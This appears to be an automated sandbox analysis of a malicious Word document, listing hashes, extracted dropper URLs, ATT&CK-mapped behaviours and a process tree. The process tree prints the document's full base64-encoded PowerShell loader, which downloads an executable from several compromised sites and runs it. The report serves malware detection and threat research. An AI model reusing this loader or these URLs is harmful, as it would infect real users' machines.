0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002

General

Target

71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc
Size

187KB
MD5

71798c1415bd2c656552ec32c9835538
SHA1

51702d9597e77b881c90467455c6479d6a8b7774
SHA256

0ed1adf222903a5b3335427d554d4a74c05a27cfd1a438788c04f3b3d720c002
SHA512

fcaaeaa1556acb2d5181f9ea0706b0d65240f3d118ca5c81cdb22361b908571aae7b9e9164ef730feaa9c97729c5e692973639e2bc9273a410f5d3329b4cd64f
SSDEEP

1536:RGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilATmd8YkYeT/EA8sap8cjufajnG:vrfrzOH98ipgEh5JYR

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://dtyl.shop/wp-content/W68Nx/

exe.dropper

https://star-speed.vip/wp-admin/U2jRIg/

exe.dropper

https://cshub123.cn/wp-admin/Gajs/

exe.dropper

https://viettellogistics.com.vn/wp-content/oS4/

exe.dropper

http://cococat.se/wp-admin/2Oaf/

exe.dropper

http://andresirjan.ir/wp-admin/JSH/

exe.dropper

https://sptrade.com.br/wp-includes/iFZOvL/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	1748	powershell.exe	82

Blocklisted process makes network request 6 IoCs

flow	pid	Process
28	3988	powershell.exe
102	3988	powershell.exe
105	3988	powershell.exe
106	3988	powershell.exe
109	3988	powershell.exe
121	3988	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3260	WINWORD.EXE
3260	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3988	powershell.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE
3260	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71798c1415bd2c656552ec32c9835538_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABDADIAdgBhAGkAagA1AD0AKAAoACcAUAAnACsAJwBjAHUAJwApACsAJwB1ACcAKwAoACcAdAAnACsAJwByAHUAJwApACkAOwAuACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AFUAcwBFAFIAcABSAG8ARgBJAEwARQBcAEgAWQAzAHkAdAAzAGkAXABTADgASwA0ADkAdQBtAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQBSAGUAYwB0AE8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAYABSAEkAdABgAFkAUAByAG8AYABUAG8AYwBvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACwAIAB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAFMAawB5AHEANwBoAG0AIAA9ACAAKAAnAFgAMgAnACsAKAAnADgAJwArACcAegAwADMAJwApACsAJwAxAGQAJwApADsAJABZAHQAaAB4AGIAcgBmAD0AKAAoACcATwAnACsAJwBuAGUAJwApACsAKAAnAHcAJwArACcAbQA5ACcAKQArACcAYgAnACkAOwAkAFcAZABhAGkAZAA4ADYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwB3ACcAKwAnAHYATwAnACkAKwAoACcASAB5ADMAJwArACcAeQB0ACcAKQArACgAJwAzAGkAJwArACcAdwB2ACcAKQArACgAJwBPACcAKwAnAFMAOAAnACkAKwAoACcAawA0ACcAKwAnADkAJwApACsAKAAnAHUAbQAnACsAJwB3ACcAKQArACcAdgBPACcAKQAuACIAUgBlAHAATABhAGAAQwBlACIAKAAoACcAdwAnACsAJwB2AE8AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAGEAUgBdADkAMgApACkAKwAkAFMAawB5AHEANwBoAG0AKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABOAGIAcQBpAHkAdABpAD0AKAAnAFQAJwArACgAJwA4ACcAKwAnAGgAeQB4AGcAJwApACsAJwBtACcAKQA7ACQAVwB0ADAAcgBlAGkAcwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQARQBxAHEAagA1AGgAOQA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAA6ACcAKwAoACcALwAvAGQAJwArACcAdAB5ACcAKQArACgAJwBsAC4AcwBoAG8AcAAvAHcAJwArACcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQALwBXADYAOAAnACkAKwAoACcATgB4ACcAKwAnAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACcAcwAnACsAKAAnADoALwAvAHMAJwArACcAdABhAHIAJwArACcALQAnACkAKwAnAHMAJwArACgAJwBwACcAKwAnAGUAZQBkAC4AJwArACcAdgBpACcAKQArACcAcAAnACsAJwAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAvAFUAJwArACcAMgAnACsAJwBqAFIASQBnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAoACcAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGMAJwArACgAJwBzAGgAdQAnACsAJwBiADEAJwApACsAKAAnADIAMwAnACsAJwAuAGMAbgAvACcAKwAnAHcAcAAtACcAKQArACcAYQAnACsAKAAnAGQAbQBpAG4ALwBHACcAKwAnAGEAJwArACcAagBzACcAKQArACcALwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAoACcAcwA6AC8AJwArACcALwAnACkAKwAoACcAdgBpAGUAdAB0AGUAbABsACcAKwAnAG8AJwArACcAZwBpAHMAdABpACcAKQArACcAYwBzACcAKwAoACcALgBjACcAKwAnAG8AJwArACcAbQAuAHYAJwApACsAJwBuAC8AJwArACcAdwAnACsAKAAnAHAAJwArACcALQAnACsAJwBjAG8AbgB0AGUAbgB0ACcAKQArACgAJwAvAG8AUwA0ACcAKwAnAC8AJwApACsAKAAnACoAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAYwAnACsAJwBvACcAKQArACgAJwBjAGEAJwArACcAdAAuAHMAZQAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AJwApACsAKAAnAGkAbgAvADIAJwArACcATwAnACkAKwAnAGEAJwArACgAJwBmACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6AC8ALwAnACsAJwBhACcAKQArACgAJwBuAGQAJwArACcAcgAnACkAKwAoACcAZQAnACsAJwBzAGkAJwApACsAKAAnAHIAagBhAG4ALgAnACsAJwBpACcAKQArACgAJwByAC8AdwAnACsAJwBwACcAKQArACcALQAnACsAKAAnAGEAZABtAGkAbgAnACsAJwAvACcAKwAnAEoAUwBIACcAKwAnAC8AKgAnACsAJwBoAHQAJwApACsAJwB0ACcAKwAoACcAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBzAHAAdAByAGEAZAAnACsAJwBlACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACcALgBiACcAKwAoACcAcgAvAHcAcAAnACsAJwAtACcAKQArACcAaQAnACsAJwBuACcAKwAnAGMAJwArACgAJwBsAHUAZABlAHMALwAnACsAJwBpAEYAJwArACcAWgBPAHYATAAnACkAKwAnAC8AJwApAC4AIgBzAFAAYABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AZQBrADEAeAB3AHUAPQAoACgAJwBLAHcAJwArACcAXwBlACcAKQArACcAcAAnACsAJwA5AHUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVABpADgAaABuADEAcAAgAGkAbgAgACQARQBxAHEAagA1AGgAOQApAHsAdAByAHkAewAkAFcAdAAwAHIAZQBpAHMALgAiAGQAYABvAHcAYABOAGwATwBhAEQAZgBgAEkAbABFACIAKAAkAFQAaQA4AGgAbgAxAHAALAAgACQAVwBkAGEAaQBkADgANgApADsAJABXADYAcAAxAGoANwBoAD0AKAAoACcASAA1ACcAKwAnADgAZQAnACkAKwAoACcAagByACcAKwAnAGwAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAVwBkAGEAaQBkADgANgApAC4AIgBMAGUATgBgAEcAdABoACIAIAAtAGcAZQAgADIANwAxADkANAApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABXAGQAYQBpAGQAOAA2ACkAOwAkAEMAZQBoAHkAbABoADkAPQAoACcAVwA1ACcAKwAoACcAYwB1AGQAJwArACcAMAA0ACcAKQApADsAYgByAGUAYQBrADsAJABLADQAMwAzAHgANAB3AD0AKAAoACcAVwBxACcAKwAnADUAJwApACsAJwAxACcAKwAoACcAcAAnACsAJwBtADkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAZQBsADQAbQBlAHQAPQAoACgAJwBNACcAKwAnAGkAbwAnACkAKwAnAGMAJwArACgAJwBmACcAKwAnADcAaAAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD7A31.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0zf43nw.p3w.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3260-7-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-1-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-4-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-5-0x00007FF81B96D000-0x00007FF81B96E000-memory.dmp

Filesize
4KB

Download
memory/3260-6-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-9-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-8-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-0-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-10-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-12-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

Filesize
64KB

Download
memory/3260-11-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-14-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-13-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-18-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-19-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-17-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-15-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-16-0x00007FF7D9340000-0x00007FF7D9350000-memory.dmp

Filesize
64KB

Download
memory/3260-572-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-32-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-75-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-599-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-595-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-3-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-92-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-2-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-561-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-565-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-31-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3260-598-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-597-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3260-596-0x00007FF7DB950000-0x00007FF7DB960000-memory.dmp

Filesize
64KB

Download
memory/3988-576-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3988-573-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download
memory/3988-77-0x000001DC51AB0000-0x000001DC51AD2000-memory.dmp

Filesize
136KB

Download
memory/3988-76-0x00007FF81B8D0000-0x00007FF81BAC5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads